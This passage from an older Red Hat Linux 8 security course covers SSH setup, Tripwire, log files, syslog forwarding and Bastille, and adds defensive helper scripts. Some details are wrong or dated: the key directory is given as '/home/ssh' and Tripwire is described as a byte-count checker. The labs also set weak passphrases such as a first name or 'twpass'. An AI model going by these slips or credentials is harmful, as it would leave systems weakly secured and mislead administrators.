The replacement for telnet is SSH, or Secure Shell. SSH creates a secure connection between the client and the server, where the client initiates all communication. There are several benefits to the security of the network from using SSH, including:

1. Authentication is encrypted, so the user name and password are never transmitted in cleartext.

2. After a session is established, the client verifies that the server is still the same host that the client started the session with.

3. Data transferred between client and server is encrypted using 128-bit encryption.

In Red Hat Linux 8.0, a version of SSH called OpenSSH is included. This includes the OpenSSH Server (openssh-server) and the OpenSSH Client (openssh-client) packages. OpenSSH also requires the OpenSSL package for the cryptographic component, which is included. The OpenSSH daemon uses the configuration file /etc/ssh/sshd_config. To configure an OpenSSH Server, you can enable the OpenSSH service by using the /sbin/service sshd start command.

secure shell: A completely encrypted shell connection between two machines protected by a super long pass-phrase.


The server will generate RSA keys for use with SSH. The RSA keys are found in the /etc/ssh directory. Key files that end with a .pub extension are public keys, and should be readable by everyone. Key files that end with a _key extension are private keys, and should only be readable by root. Once the command finishes running, you are ready to accept clients using SSH.
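The permission rule just stated (public keys readable by everyone, private keys readable by root only) is easy to check mechanically. The following script is an added example, not from the course: key_perm_problems is a hypothetical helper that inspects a directory laid out like /etc/ssh, and the demonstration builds a temporary directory of empty stand-in key files so it runs offline.

```shell
#!/bin/sh
# Added example, not from the course: verify the permissions of SSH host key
# files. key_perm_problems is a hypothetical helper; the stand-in key files
# created below are empty and constructed only for the demonstration.

# key_perm_problems DIR : print one PROBLEM line per mis-permissioned key file;
# the exit status is the number of problems found
key_perm_problems() {
    dir="$1"; bad=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # characters 5-10 of the ls mode string are the group and other bits
        go=$(ls -ld -- "$f" | cut -c5-10)
        case "$f" in
            *_key)
                # private key: group and other must have no access at all
                if [ "$go" != "------" ]; then
                    echo "PROBLEM: private key $f is accessible by group/other ($go)"
                    bad=$((bad + 1))
                fi
                ;;
            *.pub)
                # public key: world-readable is expected, but never writable by others
                case "$go" in
                    *w*)    echo "PROBLEM: public key $f is writable by group/other ($go)"
                            bad=$((bad + 1)) ;;
                    ???r??) ;;
                    *)      echo "PROBLEM: public key $f is not world-readable ($go)"
                            bad=$((bad + 1)) ;;
                esac
                ;;
        esac
    done
    return "$bad"
}

# Constructed demonstration directory (stand-ins for /etc/ssh key files).
SSH_DEMO=$(mktemp -d)
: > "$SSH_DEMO/ssh_host_rsa_key";     chmod 600 "$SSH_DEMO/ssh_host_rsa_key"
: > "$SSH_DEMO/ssh_host_rsa_key.pub"; chmod 644 "$SSH_DEMO/ssh_host_rsa_key.pub"
key_perm_problems "$SSH_DEMO" && echo "ok: key permissions match the rule"

chmod 644 "$SSH_DEMO/ssh_host_rsa_key"   # simulate a private key left world-readable
key_perm_problems "$SSH_DEMO" || echo "$? problem(s) found"
```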

TASK 3E-2: Configuring an SSH Server

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. In the Terminal Window, enter /sbin/service sshd start to start the SSH Server.

2. If necessary, acknowledge that you want to generate key pairs. The keys might have been generated during the install of the OS.

3. In the Terminal Window, navigate to /etc/ssh.

4. Check the permissions on the key files. Remember, you can use the ls -l command to do this.

5. Close all windows. The SSH server is now running.

Configuring and Using the SSH Client

The client side is straightforward as well. You must have openssh-clients and openssh installed on the client side, in comparison to openssh-server and openssh on the server side. If the required packages are installed, you are ready to walk through the process of SSH on the client side.

1. Log in as your normal user account.

2. To generate the private and public key pair that you will use, use the /usr/bin/ssh-keygen command. The pair will be located in your /home/ssh directory.

3. Enter the command to access the remote SSH server. If the SSH server is SSH1.example.com, your command would be ssh SSH1.example.com.

4. If this is the first time you have connected to this machine, you will be prompted that the authenticity of the host can’t be established. Click Yes to continue. The prompt is due to your machine not having information on the remote SSH server.

5. When you answer Yes, an entry is made into the known_hosts file in your /home/ssh directory. You are then prompted for your user name and password.

6. Enter your credentials to complete the connection to the SSH server.

Every user on the system will have a unique key pair.


TASK 3E-3: Configuring an SSH Client

Setup: You are logged on to Red Hat 8 as root. Students should work in pairs for this exercise.

1. In a Terminal Window, enter /usr/bin/ssh-keygen -t rsa to generate a new key pair.

2. Accept the default location for storing the key pair. The default will be in your user account’s home directory.

3. When you are prompted for a passphrase, enter your first name. This passphrase must be at least five characters, so if you have a short first name, add some letters or numbers to it. Confirm the passphrase when you are prompted to do so.

4. In the Terminal Window, navigate to your /root/.ssh/ directory.

5. Verify the key pair and the permissions. Again, use the ls -l command to do this.

6. Enter ssh a.b.c.d, where a.b.c.d is your partner’s IP address, to connect to your partner’s computer. Because it is your first connection to the remote SSH server, you are prompted to continue the connection.

7. Answer Yes to continue the connection.

8. When prompted, enter your credentials, just as you would if you were using telnet.

9. Navigate as you would in a telnet session to verify connectivity, then close the session by using the exit command.

10. If necessary, navigate to the known_hosts file in your /home/user.ssh/ directory. Enter cat known_hosts to view the entry for your partner’s computer.

11. Close all windows.

Use your Linux credentials, not the passphrase.


Tripwire

Tripwire is the most commonly used file-integrity checker for Linux. It is often used as part of a company’s intrusion detection system (IDS) because it can be used to maintain a snapshot taken of your system while in a known-good state, which it will compare against the running system at regular intervals to determine if any of the protected files have been altered or otherwise tampered with.

Tripwire does this by creating a one-way hash value for a directory or file. This hash is stored, and when subsequent checks are made of that directory or file, Tripwire again hashes the object and compares the resulting hash against the stored value. If the hashes do not match up, a flag is raised, and various actions can then be taken, depending on the configuration of the policy.

The Tripwire Modes

Tripwire has several modes that the user should be familiar with:

• The Database Initialization Mode is usually one of the first modes used. It will create the snapshot of your system that Tripwire will use for integrity checking.

• Integrity Checking Mode is usually run after the database has been created. This mode searches the system for differences when compared to the baseline database. This mode will generate a detailed report of any violations found according to the Tripwire policy.

• Database Update Mode is used to change your baseline database. For instance, if you monitor your /etc/shadow file and you have created accounts for two new employees, your integrity check will always report the violation, even though you needed those two changes. You could run in Database Update Mode to alter your database to include the two new changes.

• Policy Update Mode is used to update changes to Tripwire’s policy file.

• Test Mode is used to test the ability of Tripwire’s email notification system. When used, this will send a test message to the account specified.

The Tripwire Policy

The Tripwire Policy file, twpol.txt, is normally found in the /etc/tripwire directory and is a plaintext document that is configured by default to check most of the files in the Red Hat install.


tripwire: A software tool for security. Basically, it works with a database that maintains information about the byte count of files. If the byte count has changed, it will identify it to the system security manager.

intrusion: Any set of actions that attempts to compromise the integrity, confidentiality, or availability of a resource.

It should be noted though that Tripwire is not a true integrity checker in the purest sense of the word, because Tripwire does not check some properties such as the inode information.


Figure 3-27: The editable twpol.txt file.

This file can be altered like any text document to configure the policy so that only the files you specify will be checked. In addition to defining what files should be checked, there are several options that will determine how Tripwire will react while checking those files. This is a small list of some of the more important options that can be used:

• /etc/shadow -> $(IgnoreNone) tells Tripwire that it should report any and all changes made to the shadow file.

• !/proc tells Tripwire to ignore the entire /proc directory.

• /var/log/maillog -> $(Growing) tells Tripwire that the file is expected to get larger (as most logs do), but still alert if the file gets smaller.

• /etc/shadow -> +ug (emailto=admin@some_company.net) tells Tripwire to email an alert if there is a change noticed in the shadow file.

After the policy file has been configured, it is time to start things rolling. From the /etc/tripwire directory, run the command ./twinstall.sh to start the process of creating key pairs for securing files, creating the twpol file, and creating the backup of the twpol file.
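To make the hash-and-compare cycle and the two policy rules above concrete, here is an added example (not Tripwire's code and not from the course) that mimics Database Initialization and Integrity Checking in plain POSIX shell: baseline_add records a one-way hash and the byte count of a file under a rule name, and integrity_check replays the rule, reporting any change for IgnoreNone and only shrinkage for Growing. The helper names are hypothetical, and the stand-in shadow and maillog files are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example, not from the course and not Tripwire itself: a minimal
# baseline/check cycle in the spirit of the IgnoreNone and Growing rules.
# baseline_add, integrity_check, file_hash and file_size are hypothetical
# helpers; the sample files below are constructed for the demonstration.

# file_hash FILE : one-way hash of the file's contents (SHA-256)
file_hash() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# file_size FILE : size in bytes
file_size() { wc -c < "$1" | tr -d ' '; }

# baseline_add DB RULE PATH : append "RULE HASH SIZE PATH" to the baseline DB
baseline_add() {
    printf '%s %s %s %s\n' "$2" "$(file_hash "$3")" "$(file_size "$3")" "$3" >> "$1"
}

# integrity_check DB : compare every recorded object with the live file;
# prints one VIOLATION line per finding and returns the number of violations
integrity_check() {
    n=0
    while read -r rule hash size path; do
        if [ ! -f "$path" ]; then
            echo "VIOLATION: $path is missing"; n=$((n + 1)); continue
        fi
        cur_hash=$(file_hash "$path"); cur_size=$(file_size "$path")
        case "$rule" in
            IgnoreNone)
                # any change at all is a violation
                if [ "$cur_hash" != "$hash" ]; then
                    echo "VIOLATION: $path modified (hash changed)"; n=$((n + 1))
                fi
                ;;
            Growing)
                # growth is expected; only a smaller file is a violation
                if [ "$cur_size" -lt "$size" ]; then
                    echo "VIOLATION: $path shrank from $size to $cur_size bytes"; n=$((n + 1))
                fi
                ;;
        esac
    done < "$1"
    return "$n"
}

# Constructed demonstration: stand-ins for /etc/shadow and /var/log/maillog.
TW_LAB=$(mktemp -d); TW_DB="$TW_LAB/baseline.twd"
printf 'root:*:12345:0:99999:7:::\n' > "$TW_LAB/shadow"
printf 'Dec 10 10:00:01 host sendmail[100]: started\n' > "$TW_LAB/maillog"
baseline_add "$TW_DB" IgnoreNone "$TW_LAB/shadow"    # like: /etc/shadow -> $(IgnoreNone)
baseline_add "$TW_DB" Growing    "$TW_LAB/maillog"   # like: /var/log/maillog -> $(Growing)

printf 'Dec 10 10:05:00 host sendmail[100]: message accepted\n' >> "$TW_LAB/maillog"
integrity_check "$TW_DB" && echo "no violations: the log grew, which Growing allows"

printf 'newuser:*:12346:0:99999:7:::\n' >> "$TW_LAB/shadow"   # an account was added
: > "$TW_LAB/maillog"                                        # the log was truncated
integrity_check "$TW_DB" || echo "$? violation(s) reported"
```

Tripwire's real $(Growing) mask also compares the unchanged prefix of the file and several inode attributes; this example keeps only the size rule the text describes.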

alert: A formatted message describing a circumstance relevant to network security. Alerts are often derived from critical audit events.


Figure 3-28: Tripwire setup and passphrase request.

The Tripwire Database

The Tripwire database will be generated using the configuration parameters that were defined earlier. To start the database-creation process, run the tripwire --init command. Depending on the number and size of the files that are being checked, the database generation can take a significant amount of time. It is for this reason that, when we change the policy, we will be checking only a single file! To view the specifics of the database, run the twprint --print-dbfile command.

The Tripwire Integrity Check

Once the database has been created, it’s generally a good idea to make sure that the notification system is operating properly by using the test parameter. To do this, enter the tripwire --test --email root@localhost command into a Terminal Window.


Figure 3-29: The Tripwire mail test.

To actually run an integrity check, use the tripwire --check command.

There are a few switches that you might want to use if you are automating this with a script. The -s switch will not display the report to standard output, usually because you will not be logged in when the script will be set to run. The -M switch will tell it to email the report if you have placed an emailto= line in your policy.

To read the results of a report, use the twprint --print-report -r /var/lib/tripwire/report/XXXXX.twr command, where XXXXX.twr is the name of one of the report files located in the /var/lib/tripwire/report/ directory.

Best Practices

It is generally a good idea not to keep the database in its default location (/var/lib/tripwire/hostname.twd), because anyone who gains unauthorized access to the system might be able to update the database so that it will not report any of the files that were altered. Often, the database is placed onto read-only media, such as a CD-ROM. In such a case, the integrity check command would have to include the -d option to tell Tripwire where the database is located; for example: tripwire --check -d /mnt/cdrom/dbfile.twd

To change your database, update the policy file (twpol.txt) as needed, and then run the tripwire -m p /etc/tripwire/twpol.txt command.

To automate the running of Tripwire, you can run it as a cron job. By default, Red Hat has an entry in the /etc/cron.daily/ directory to have Tripwire run daily. If it is not there, you can create a simple job to run, similar to the following:

1. Create a new text file named tripwire, and enter the following lines.

#!/bin/bash
# Daily Tripwire Check
/usr/sbin/tripwire --check -M

2. Place the new file in the /etc/cron.daily/ directory.

3. Make the file executable by running the chmod -v u+x tripwire command.


TASK 3E-4: Starting Tripwire

Setup: You are logged on to Red Hat 8 as root.

1. Start Nautilus File Manager, and navigate to /etc/tripwire.

2. Make a backup copy of the twpol.txt file.

3. Open the twpol.txt file in a text editor such as Emacs.

4. Edit the twpol.txt file to read as follows:

@@section FS
SIG_HI = 100;

(
  rulename = "Passwd Check",
  severity = $(SIG_HI),
  emailto = root@localhost
)
{
  /etc/shadow -> $(IgnoreNone);
}

In the interest of time, you will be checking and tracking only the shadow password file for changes. In a production install, you would obviously be tracking changes far more thoroughly.

Save and close the file.

5. In a Terminal Window, navigate to the /etc/tripwire directory, and enter ./twinstall.sh to run the Tripwire install.

6. When you are asked for a site keyfile passphrase, enter and confirm twpass as the site passphrase.

7. When you are prompted to provide a local keyfile passphrase, enter and confirm localpass as the local passphrase.

8. When you are prompted for the site passphrase, enter twpass to continue with the install.

You will be notified that the configuration file was written to the /etc/tripwire directory as tw.cfg, and that a cleartext version, called twcfg.txt, was written for your inspection. After inspecting twcfg.txt, you should delete it for security purposes.

Like with the smb.conf file, you can delete all of the existing text because you have a backup of the original configuration file.


9. When you are prompted for your site passphrase so that the new policy can be signed, enter twpass to complete the setup routine.

10. In the Terminal Window, enter tripwire --init to start Tripwire.

11. When you are prompted for the local keyfile passphrase, enter localpass to provide the local passphrase.

12. Observe the message that states the database was successfully generated.

13. In the Terminal Window, enter tripwire --test --email root@localhost to test the email capabilities of Tripwire. You will see a message telling you that an email is being sent.

14. To see if the email was delivered correctly, switch to Nautilus File Manager, and navigate to the /var/spool/mail/ directory.


15. Right-click the root file, and choose Open In New Window to open the Tripwire email. If you have not deleted this file recently, you may have several messages from the system already—scroll down to the bottom, and the test email from Tripwire should be there.

16. Navigate to the email folder (/var/spool/mail/), and delete the root file. This will make it easier for you to find future email messages.

17. Switch back to the Terminal Window, and enter tripwire --check -M to perform an integrity check and have Tripwire email you the report.


18. Return to the /var/spool/mail/ directory, and verify that you have a new root file.

19. Rename the root file to rootfirst to rename the Tripwire email report.

20. Open the rootfirst file by right-clicking it and choosing Open In New Window. This is the report you just generated, which is also visible in the Terminal Window if you scroll up a little. Keep the window open—we will compare this report to the next report we generate.

21. From the Red Hat Main Menu, choose System Settings→Users And Groups to open the Users And Groups tool.

22. Select any user that you created during an earlier exercise, change the user’s password, and exit the tool.

23. Switch to the Terminal Window, and run the tripwire --check -M command again.

24. Return to the /var/spool/mail/ directory, and open the new root file. Compare it to the rootfirst file, looking for differences. Pay particular attention to the Object Detail sections to view the differences. In the Tripwire reports, Access Time will always show up, but the Modify and Change times should not differ unless there has been a change to the file (as would be the case if someone created a new account or modified a password).

25. Close all windows.

If, for some reason, you have removed all accounts except the root account, you can also add a new user account to accomplish the same goal.


Logging

Logging is a necessary evil in all operating systems. In Linux, you are presented with the ability to log enormous amounts of data. You can log the system, applications, and protocols. The output of most of the logs is text files in the /var/log directory. Figure 3-30 shows a partial listing of the /var/log directory on Red Hat Linux 8.0.

Figure 3-30: The /var/log file.

There are far too many log files to cover in this lesson, so you will examine several of the critical log files as they relate to security. The first two logs are called lastlog and last.

The lastlog Log File

The /var/log/lastlog file tracks the last login of user accounts into the system. The full log will provide extensive information, so if you are just curious about a single user account, use the command syntax: lastlog -u <username>. This is a temporary log—one that you should back up daily if you want to use this data over time.



Figure 3-31: The /var/log/lastlog file.

The last Log File

The last file tracks the last login data, similar to the previous example, but adds another level of information. This file can report on the users, their IP addresses (or hostnames), the date and time of the last connection, and the duration of the last session. Stored in /var/log/wtmp, this log can be viewed by using the last command in the Terminal Window. If you are looking for information on a specific user account, use the syntax: last <username>. Using the -a option will display hostname information, and the -d option will display hostname and IP address information.


Figure 3-32: The last log output with the -a and the -d options.

TASK 3E-5: Logging Recent Login Activity

Setup: You are logged on to Red Hat 8 as root.

1. In Nautilus File Manager, navigate to the /var/log directory.

2. Observe the logs that are stored in this directory.

3. In a Terminal Window, navigate to the /var/log directory.

4. Enter lastlog to view the lastlog file.

5. In another Terminal Window, enter last -a -d root to check the last log for root.

6. Close all windows.


The xferlog Log File

If your system is running FTP, you will most likely want to track the file transfers taking place. The xfer log is the one you will investigate for these details. Usually found in the /usr/adm directory, the log contains server entries, each composed of a single line. You can read this output in the Terminal Window by simply viewing /var/log/xferlog (you may end up using the more option). The fields that this log can track are extensive, and include:

• The date of the transfer.

• The time of the transfer.

• The duration of the transfer.

• The client hostname and IP address.

• The size of the file transferred.

• The file name of the file transferred.

• The transfer type (ASCII or binary).

• The direction of the transfer (incoming or outgoing).

• The access method (anonymous, guest, or user account).

• The authentication method.
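As an added example (not from the course), the following Python decodes the fixed-position fields of a wu-ftpd/ProFTPD style xferlog line into the names listed above and pulls out completed uploads made over anonymous access, the entries a reviewer of this log normally checks first; the log lines, hosts and file names are constructed samples.

```python
"""Parse xferlog entries and flag anonymous uploads.

Added example, not part of the course text. The field order is the
wu-ftpd/ProFTPD xferlog layout; the three log lines below are constructed.
"""
from datetime import datetime
from typing import Dict, List

# Constructed sample log (not real traffic): one transfer per line.
SAMPLE_XFERLOG = """\
Mon Jan 13 08:12:03 2003 2 10.20.30.41 4096 /pub/readme.txt a _ o r alice ftp 0 * c
Mon Jan 13 08:15:47 2003 17 10.20.30.9 1048576 /incoming/tool.tgz b _ i a anon@example.com ftp 0 * c
Mon Jan 13 08:16:02 2003 1 10.20.30.9 2048 /pub/index.html a _ o a anon@example.com ftp 0 * i
"""

# Single-letter codes used in the fixed-position fields.
TRANSFER_TYPE = {"a": "ascii", "b": "binary"}
DIRECTION = {"i": "incoming", "o": "outgoing", "d": "deleted"}
ACCESS_MODE = {"a": "anonymous", "g": "guest", "r": "real"}
AUTH_METHOD = {"0": "none", "1": "RFC931"}
COMPLETION = {"c": "complete", "i": "incomplete"}

# The timestamp occupies the first five whitespace-separated words
# ("Mon Jan 13 08:12:03 2003"); xferlog writes spaces inside file names
# as "_", so a plain split() is safe for the remaining thirteen fields.
_TS_WORDS = 5
_FIELDS_AFTER_TS = 13


def parse_xferlog_line(line: str) -> Dict[str, object]:
    """Split one xferlog line into the named fields the course lists."""
    parts = line.split()
    if len(parts) != _TS_WORDS + _FIELDS_AFTER_TS:
        raise ValueError(f"unexpected xferlog line: {line!r}")
    stamp = " ".join(parts[:_TS_WORDS])   # also collapses a padded day ("Jan  3")
    (secs, host, size, fname, ttype, _special, direction, mode,
     user, service, auth, _auth_uid, status) = parts[_TS_WORDS:]
    return {
        "time": datetime.strptime(stamp, "%a %b %d %H:%M:%S %Y"),
        "duration_s": int(secs),
        "client": host,                      # hostname or IP address
        "size": int(size),
        "filename": fname,
        "transfer_type": TRANSFER_TYPE.get(ttype, ttype),
        "direction": DIRECTION.get(direction, direction),
        "access_method": ACCESS_MODE.get(mode, mode),
        "user": user,
        "service": service,
        "auth_method": AUTH_METHOD.get(auth, auth),
        "completion": COMPLETION.get(status, status),
    }


def parse_xferlog(text: str) -> List[Dict[str, object]]:
    """Parse every non-blank line of an xferlog file."""
    return [parse_xferlog_line(row) for row in text.splitlines() if row.strip()]


def anonymous_uploads(text: str) -> List[Dict[str, object]]:
    """Return completed incoming transfers made via anonymous access.

    An anonymous FTP area that accepts uploads is a common place for an
    intruder to stash files, so these entries deserve a look.
    """
    return [
        e for e in parse_xferlog(text)
        if e["access_method"] == "anonymous"
        and e["direction"] == "incoming"
        and e["completion"] == "complete"
    ]


if __name__ == "__main__":
    for entry in anonymous_uploads(SAMPLE_XFERLOG):
        print(f"{entry['time']:%Y-%m-%d %H:%M} {entry['client']} "
              f"uploaded {entry['filename']} ({entry['size']} bytes)")
```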

Web Server Log Files

Just as you will want to track your logs for an FTP server, if you are running a Web server, such as Apache, you will want to have solid logging of the Web connections. The Apache server process generally has two logs, found in /var/log/httpd. The two logs are:

• access_log—Logging clients who contacted the Web server, when, how, and what the client did while connected.

• error_log—Logging access attempts, both successes and failures.

The access_log will track the client’s IP address, the time and date of access, the command or request the client made, and the status code. The status codes are listings such as:

• 200—Transfer completed without error.

• 201—A successful POST command has completed.

• 300—Client requested data that has moved.

• 404—The requested document was not found.

The error_log will track data such as the date and time of the connection, the type of error report, the reason for the error, the service, and the action taken (if any).
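Added example, not part of the course: a Python pass over Apache Common Log Format access_log lines that labels each response with the status meanings given above, counts codes per client, and lists any client that has produced a run of 404s (a sign of someone guessing at paths). The log lines are constructed samples.

```python
"""Summarize Apache access_log entries by client and status code.

Added example, not part of the course. Lines follow Apache's Common Log
Format; the sample below is constructed, and the status meanings are the
ones given in the course text.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, List

# Constructed sample access_log (not real traffic).
SAMPLE_ACCESS_LOG = """\
10.20.30.41 - - [13/Jan/2003:08:20:11 -0500] "GET /index.html HTTP/1.0" 200 1234
10.20.30.41 - alice [13/Jan/2003:08:20:15 -0500] "POST /cgi-bin/form HTTP/1.0" 201 0
10.20.30.9 - - [13/Jan/2003:08:21:01 -0500] "GET /old-site/ HTTP/1.0" 300 188
10.20.30.9 - - [13/Jan/2003:08:21:02 -0500] "GET /admin/ HTTP/1.0" 404 294
10.20.30.9 - - [13/Jan/2003:08:21:03 -0500] "GET /private/ HTTP/1.0" 404 294
10.20.30.9 - - [13/Jan/2003:08:21:04 -0500] "GET /setup/ HTTP/1.0" 404 294
"""

# Status meanings as the course lists them.
STATUS_MEANING = {
    200: "transfer completed without error",
    201: "successful POST completed",
    300: "requested data has moved",
    404: "requested document not found",
}

# Common Log Format: host ident authuser [date] "request" status bytes
_CLF = re.compile(
    r'^(?P<client>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-)$'
)


def parse_access_log(text: str) -> List[Dict[str, object]]:
    """Parse CLF lines; lines that do not match are skipped, not guessed at."""
    entries = []
    for line in text.splitlines():
        m = _CLF.match(line)
        if not m:
            continue
        entries.append({
            "client": m["client"],
            "user": None if m["user"] == "-" else m["user"],
            "time": m["time"],
            "request": m["request"],
            "status": int(m["status"]),
            "bytes": 0 if m["bytes"] == "-" else int(m["bytes"]),
        })
    return entries


def status_by_client(entries: List[Dict[str, object]]) -> Dict[str, Counter]:
    """Count status codes per client address."""
    counts: Dict[str, Counter] = defaultdict(Counter)
    for e in entries:
        counts[e["client"]][e["status"]] += 1
    return dict(counts)


def clients_probing(entries: List[Dict[str, object]], min_404: int = 3) -> List[str]:
    """Clients with at least min_404 'not found' responses.

    A run of 404s from one address usually means someone guessing at paths
    rather than following links, so it is worth a closer look.
    """
    return sorted(c for c, cnt in status_by_client(entries).items()
                  if cnt[404] >= min_404)


def describe(status: int) -> str:
    """Human-readable meaning of a status code from the course's list."""
    return STATUS_MEANING.get(status, "other status")


if __name__ == "__main__":
    log_entries = parse_access_log(SAMPLE_ACCESS_LOG)
    for client, cnt in status_by_client(log_entries).items():
        summary = ", ".join(f"{code} ({describe(code)}): {n}"
                            for code, n in sorted(cnt.items()))
        print(f"{client}: {summary}")
    print("clients to review:", clients_probing(log_entries))
```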

The secure Log File

When you were configuring services for xinetd and for TCP wrappers, there was an option in the configuration file of the service for log_on_failure and log_on_success. You can view entries from these options, as well as SSH connection status, in the /var/log/secure file.

More information might be logged depending on how httpd.conf is configured on the Apache server.


Using the Log Viewer

You might become comfortable reading the logs directly from their sources. However, in Red Hat, there is a utility that is designed to help with reading and managing the log files. This utility, called the Log Viewer, can be found under the Red Hat Main Menu by choosing System Tools→System Logs, or in a Terminal Window by using the redhat-logviewer command. The logviewer program is able to display only those log files that it knows exist. The configuration file that stores the available logs is found at /etc/sysconfig/redhat-logviewer. The Log Viewer is shown in Figure 3-33.

Figure 3-33: The logs presented in the Red Hat Log Viewer.

The Red Hat Log Viewer is a dynamic program, meaning that it keeps updating the information seen on-screen to remain current. The default refresh rate is 30 seconds. The default can be changed in the viewer (by altering the Preferences) or directly in the sysconfig file, where the available logs are stored. You can also force an immediate refresh by using the File→Refresh Now command, or by pressing Ctrl+R.

TASK 3E-6: Using the Log Viewer

Setup: You are logged on to Red Hat 8 as root.

1. From the Red Hat Main Menu, choose System Tools→System Logs to open the Log Viewer.

2. View the Security Log, noting the records of access.

3. View the System Log, noting the records of access.


4. Another handy log to view is the one that defines the RPM packages installed. Check the RPM Packages list to see the Open SSH components that are installed.

5. Once you have viewed all the information you want, close the window.

Securing Log Files

Although reading the log files directly can provide you the information you are seeking, there is a risk of leaving the files on the computer itself. If an attacker does compromise the server, an initial target will be to wipe out any log files that can trace the attacker’s activities.

One option to combat this is to use syslog. Syslog is the logging subsystem in Linux (and UNIX) that controls the logging function. A benefit of syslog is that it is possible to have logs forwarded to another system in the network. The primary configuration file for syslog is /etc/syslog.conf.
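As an added example (not course code), this Python reads an /etc/syslog.conf in the Red Hat style, works out which facilities are forwarded with an @host action, and reports the security facilities that are still only kept locally, which is exactly what an attacker who wipes the local logs would erase. The configuration text is constructed and loghost is a placeholder name.

```python
"""Check an /etc/syslog.conf for remote forwarding of security facilities.

Added example, not part of the course. The configuration text is a
constructed Red Hat style syslog.conf; "loghost" is a placeholder name for
the central log server.
"""
from typing import List, Set, Tuple

# Constructed example configuration. Each rule is "selector<tab>action";
# a selector is facility.priority (several joined with ';'), an action is a
# file, "*" (write to all logged-in users) or "@host" (forward to a remote
# syslog server).
SAMPLE_SYSLOG_CONF = """\
# Log anything (except mail) of level info or higher.
*.info;mail.none;authpriv.none;cron.none        /var/log/messages
# The authpriv file has restricted access.
authpriv.*                                      /var/log/secure
mail.*                                          -/var/log/maillog
cron.*                                          /var/log/cron
*.emerg                                         *
local7.*                                        /var/log/boot.log
# Send authentication and kernel messages to the central log host as well.
authpriv.*;kern.*                               @loghost
"""

# Facilities an intruder is most likely to want to erase from a compromised host.
SECURITY_FACILITIES = ("authpriv", "auth", "kern")

Rule = Tuple[List[Tuple[str, str]], str]   # ([(facility, priority), ...], action)


def parse_syslog_conf(text: str) -> List[Rule]:
    """Return one (selectors, action) pair per non-comment rule line."""
    rules: List[Rule] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        selector, action = line.split(None, 1)
        pairs: List[Tuple[str, str]] = []
        for sel in selector.split(";"):
            facs, _, prio = sel.partition(".")
            for fac in facs.split(","):          # "uucp,news.crit" style
                pairs.append((fac, prio))
        rules.append((pairs, action.strip()))
    return rules


def forwarded_facilities(text: str) -> Set[str]:
    """Facilities that at least one rule sends to a remote host ('@host')."""
    forwarded: Set[str] = set()
    for pairs, action in parse_syslog_conf(text):
        if not action.startswith("@"):
            continue
        for fac, prio in pairs:
            if prio != "none":               # "x.none" excludes, it does not send
                forwarded.add(fac)
    return forwarded


def missing_remote_copies(text: str, wanted=SECURITY_FACILITIES) -> List[str]:
    """Wanted facilities that never leave the box, so a local wipe loses them."""
    fwd = forwarded_facilities(text)
    if "*" in fwd:                           # "*.info @host" covers everything
        return []
    return [f for f in wanted if f not in fwd]


if __name__ == "__main__":
    print("forwarded:", sorted(forwarded_facilities(SAMPLE_SYSLOG_CONF)))
    print("kept only locally:", missing_remote_copies(SAMPLE_SYSLOG_CONF) or "none")
```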

Bastille

Bastille is an Open Source program that can help you automate many of the processes for hardening a Linux machine. It can help ease an administrator’s job by making several tasks—like implementing IPChains, enabling or disabling services, and closing unused ports—quick and simple by asking the user a long series of mostly yes or no type questions.

Bastille’s Abilities

Bastille has the ability to help automate many security-minded functions on a system, including:

• Disabling the compiler.

• Creating login banners.

• Restricting resource usage.

• Disabling IP-based authentication protocols for anti-spoofing protection.

• Finding and updating RPMs by using the RedHat errata Web site (www.redhat.com/support/errata).

• Disabling system shutdown via the Ctrl+Alt+Delete key combination.

• Restricting access to many common administration utilities.

• Protecting the LILO with a password.

• Running an IPChains script to automate much of the configuration to make the machine a firewall.

• Configuring NAT settings (as part of IPChains).

• Limiting console login rights.

• Setting password aging parameters.

• Configuring remote logging.

• Removing unneeded daemons.

• Hardening Apache (not always as predictable as you might expect).

compromise: An intrusion into a computer system where unauthorized disclosure, modification, or destruction of sensitive information may have occurred.

Bastille

spoofing: Pretending to be someone else. The deliberate inducement of a user or a resource to take an incorrect action. Attempt to gain access to an AIS by pretending to be an authorized user. Impersonating, masquerading, and mimicking are forms of spoofing.


Installing and Using Bastille

To install Bastille, you will need the RPM for Bastille, as well as the pwlib and perl-Tk RPMs. The RPMs should be installed in that same order, then—from a Terminal Window, issue the command bastille to start the Bastille configuration routine. From there, follow the prompts and answer all the questions before continuing on to the next section.

The left side of the screen lists the section of the config you are dealing with (the Module). The top right lists the question you are presently dealing with. The center right has a brief description of, or the purpose of, the current module. The bottom right is where you answer the yes or no question.

Figure 3-34: Bastille Q&A.

For some of the questions, you can opt to enter things like warning banners. When it is time to enter the text for your message or to enter a password (for any question that can’t be answered yes or no), just type the text into the bottom-right window labeled Answer.


Undoing Configuration Changes

The best way to make sure that you do not need to undo any changes is to—like the old carpenter’s adage—measure twice, cut once. By this, we mean that you should make a change only if you understand the repercussions of the choices you are making. However, this isn’t a perfect world, and sometimes, changes need to be made. For this reason, there are a few possible ways to undo the changes made to a system. Of course, they aren’t 100 percent, so always try to measure twice before cutting! To undo configuration changes, you can try the following:

• Rerun Bastille, and make different choices to reverse the previous answers. To do this, navigate to the Bastille directory and use the ./InteractiveBastille.pl command.

• There is also a perl script that was made to try to undo changes; accurately enough, it is named undo.pl, and is located in the Bastille directory.

• The last way to attempt a reversal of Bastille changes is to go to the backup directory (/root/Bastille/undo/backup); this directory contains copies of the system files that Bastille has altered. You should, with relative ease, be able to replace most of these files, even if it will not be a fast or automated solution.

It should be obvious that, with all that Bastille can control, you should be careful with your configuration choices. Selecting options that you don’t fully understand can cause problems with running programs and accessing the machine for legitimate uses. It is for this reason that the Bastille routine should be run—but not implemented—on your machine in class. Feel free to explore all the options, but do not apply the configuration changes!

TASK 3E-7: Installing and Exploring Bastille

Setup: You are logged on to Red Hat 8 as root.

1. Create the directory /bastille where you will store the Bastille files.

2. Copy the three required files to the /bastille directory. The files are:

Bastille-2.0.4-1.0.i386.rpm

pwlib-1.3.3-5.i386.rpm

